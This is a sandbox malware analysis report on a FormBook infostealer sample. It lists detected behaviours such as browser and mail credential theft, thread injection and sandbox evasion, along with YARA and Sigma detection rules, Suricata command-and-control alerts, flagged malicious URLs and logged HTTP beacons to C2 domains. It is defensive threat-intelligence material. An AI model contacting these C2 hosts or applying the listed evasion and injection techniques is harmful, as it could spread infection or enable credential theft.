Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QLLafoDdqv.exe

Overview

General Information

Sample name:QLLafoDdqv.exe
renamed because original name is a hash value
Original sample name:16a3ae414f6303383d089b24318edcedb5891f081108035ee2017c3a61ab0012.exe
Analysis ID:1486705
MD5:9f295f94dfaf4a72ef4aaa28e15543f5
SHA1:5708ab5bfabaa81d29709fabdd08aa8ba5891d47
SHA256:16a3ae414f6303383d089b24318edcedb5891f081108035ee2017c3a61ab0012
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • QLLafoDdqv.exe (PID: 1656 cmdline: "C:\Users\user\Desktop\QLLafoDdqv.exe" MD5: 9F295F94DFAF4A72EF4AAA28E15543F5)
    • svchost.exe (PID: 1804 cmdline: "C:\Users\user\Desktop\QLLafoDdqv.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • WOaBXdWwIJKzuV.exe (PID: 3620 cmdline: "C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 2664 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • WOaBXdWwIJKzuV.exe (PID: 5700 cmdline: "C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3536 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x3e43f:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x27ade:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.24d0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.24d0000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.24d0000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.24d0000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\QLLafoDdqv.exe", CommandLine: "C:\Users\user\Desktop\QLLafoDdqv.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\QLLafoDdqv.exe", ParentImage: C:\Users\user\Desktop\QLLafoDdqv.exe, ParentProcessId: 1656, ParentProcessName: QLLafoDdqv.exe, ProcessCommandLine: "C:\Users\user\Desktop\QLLafoDdqv.exe", ProcessId: 1804, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\QLLafoDdqv.exe", CommandLine: "C:\Users\user\Desktop\QLLafoDdqv.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\QLLafoDdqv.exe", ParentImage: C:\Users\user\Desktop\QLLafoDdqv.exe, ParentProcessId: 1656, ParentProcessName: QLLafoDdqv.exe, ProcessCommandLine: "C:\Users\user\Desktop\QLLafoDdqv.exe", ProcessId: 1804, ProcessName: svchost.exe

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-08-02T13:53:43.440829+0200
            SID:2050745
            Source Port:64512
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-02T13:53:27.259778+0200
            SID:2050745
            Source Port:49770
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-02T13:51:57.423849+0200
            SID:2050745
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-02T13:52:25.093527+0200
            SID:2050745
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-02T13:54:27.403003+0200
            SID:2050745
            Source Port:64523
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-02T13:53:05.503000+0200
            SID:2050745
            Source Port:49766
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-02T13:54:04.925630+0200
            SID:2050745
            Source Port:64518
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-02T13:52:38.434979+0200
            SID:2050745
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-02T13:51:43.897495+0200
            SID:2050745
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-02T13:51:16.664024+0200
            SID:2050745
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-02T13:52:51.871610+0200
            SID:2050745
            Source Port:49762
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-02T13:51:30.591363+0200
            SID:2050745
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-02T13:54:18.417842+0200
            SID:2050745
            Source Port:64522
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-02T13:50:17.693616+0200
            SID:2050745
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-02T13:52:11.078419+0200
            SID:2050745
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.empowermedeco.com/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.shenzhoucui.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBTD8WClZdEhsa3dPrDeE1SdlnJbrG6MsWCo/sylvA1Bg/24QA05c=Avira URL Cloud: Label: malware
            Source: http://www.liangyuen528.com/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.liangyuen528.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8=Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=Avira URL Cloud: Label: malware
            Source: http://www.empowermedeco.com/fo8o/?blWd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&Ixe=Apq4tPPXNdTp2Avira URL Cloud: Label: malware
            Source: http://www.kasegitai.tokyo/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.shenzhoucui.com/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/Avira URL Cloud: Label: malware
            Source: https://www.empowermedeco.com/fo8o/?blWd=mxnRAvira URL Cloud: Label: malware
            Source: http://www.kasegitai.tokyo/fo8o/?blWd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&Ixe=Apq4tPPXNdTp2Avira URL Cloud: Label: malware
            Source: http://www.techchains.info/fo8o/Avira URL Cloud: Label: phishing
            Multi AV Scanner detection for domain / URL
            Source: www.donnavariedades.comVirustotal: Detection: 8%Perma Link
            Source: empowermedeco.comVirustotal: Detection: 11%Perma Link
            Source: www.liangyuen528.comVirustotal: Detection: 6%Perma Link
            Source: www.kasegitai.tokyoVirustotal: Detection: 7%Perma Link
            Source: www.rssnewscast.comVirustotal: Detection: 6%Perma Link
            Source: www.goldenjade-travel.comVirustotal: Detection: 8%Perma Link
            Source: www.shenzhoucui.comVirustotal: Detection: 8%Perma Link
            Source: www.techchains.infoVirustotal: Detection: 10%Perma Link
            Source: www.magmadokum.comVirustotal: Detection: 9%Perma Link
            Source: www.660danm.topVirustotal: Detection: 10%Perma Link
            Source: www.antonio-vivaldi.mobiVirustotal: Detection: 9%Perma Link
            Source: www.3xfootball.comVirustotal: Detection: 9%Perma Link
            Source: www.empowermedeco.comVirustotal: Detection: 5%Perma Link
            Source: elettrosistemista.zipVirustotal: Detection: 10%Perma Link
            Source: www.k9vyp11no3.cfdVirustotal: Detection: 8%Perma Link
            Source: www.b301.spaceVirustotal: Detection: 6%Perma Link
            Source: www.elettrosistemista.zipVirustotal: Detection: 7%Perma Link
            Source: http://www.magmadokum.com/fo8o/Virustotal: Detection: 10%Perma Link
            Source: http://www.empowermedeco.com/fo8o/Virustotal: Detection: 8%Perma Link
            Source: http://www.liangyuen528.com/fo8o/Virustotal: Detection: 6%Perma Link
            Source: http://www.rssnewscast.com/fo8o/Virustotal: Detection: 5%Perma Link
            Multi AV Scanner detection for submitted file
            Source: QLLafoDdqv.exeReversingLabs: Detection: 55%
            Source: QLLafoDdqv.exeVirustotal: Detection: 40%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.24d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.24d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2270118769.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2269837439.00000000024D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4574542638.0000000002F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4575593241.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2270555889.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: QLLafoDdqv.exeJoe Sandbox ML: detected
            Source: QLLafoDdqv.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WOaBXdWwIJKzuV.exe, 00000003.00000002.4564777627.0000000000D5E000.00000002.00000001.01000000.00000004.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4568620596.0000000000D5E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: QLLafoDdqv.exe, 00000000.00000003.2121082522.0000000004120000.00000004.00001000.00020000.00000000.sdmp, QLLafoDdqv.exe, 00000000.00000003.2125915509.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2270155402.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2270155402.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178687153.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2180433869.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2270123023.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4578682189.0000000003100000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2272280186.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4578682189.000000000329E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: QLLafoDdqv.exe, 00000000.00000003.2121082522.0000000004120000.00000004.00001000.00020000.00000000.sdmp, QLLafoDdqv.exe, 00000000.00000003.2125915509.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2270155402.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2270155402.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178687153.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2180433869.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.2270123023.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4578682189.0000000003100000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2272280186.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4578682189.000000000329E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2269979918.0000000002800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2238927543.000000000281A000.00000004.00000020.00020000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000003.00000002.4570954462.00000000014A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4567487590.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580387603.000000000372C000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.000000000318C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2556821079.0000000006F3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4567487590.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580387603.000000000372C000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.000000000318C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2556821079.0000000006F3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2269979918.0000000002800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2238927543.000000000281A000.00000004.00000020.00020000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000003.00000002.4570954462.00000000014A8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0073DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0073DBBE
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0070C2A2 FindFirstFileExW,0_2_0070C2A2
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_007468EE FindFirstFileW,FindClose,0_2_007468EE
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0074698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0074698F
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0073D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0073D076
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0073D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0073D3A9
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00749642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00749642
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0074979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0074979D
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00749B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00749B2B
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00745C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00745C97
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0254BAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_0254BAB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax4_2_02539480
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi4_2_0253DD45
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h4_2_02DA053E

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.joyesi.xyz
            Source: DNS query: www.joyesi.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownTCP traffic detected without corresponding DNS query: 199.59.243.226
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0074CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0074CE44
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?blWd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&Ixe=Apq4tPPXNdTp2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.kasegitai.tokyoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?blWd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Za05B0b8lb0SJyq2CvxKSeitE8AGVnlTlldZE82pgolkPyTnRDO8=&Ixe=Apq4tPPXNdTp2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.antonio-vivaldi.mobiConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
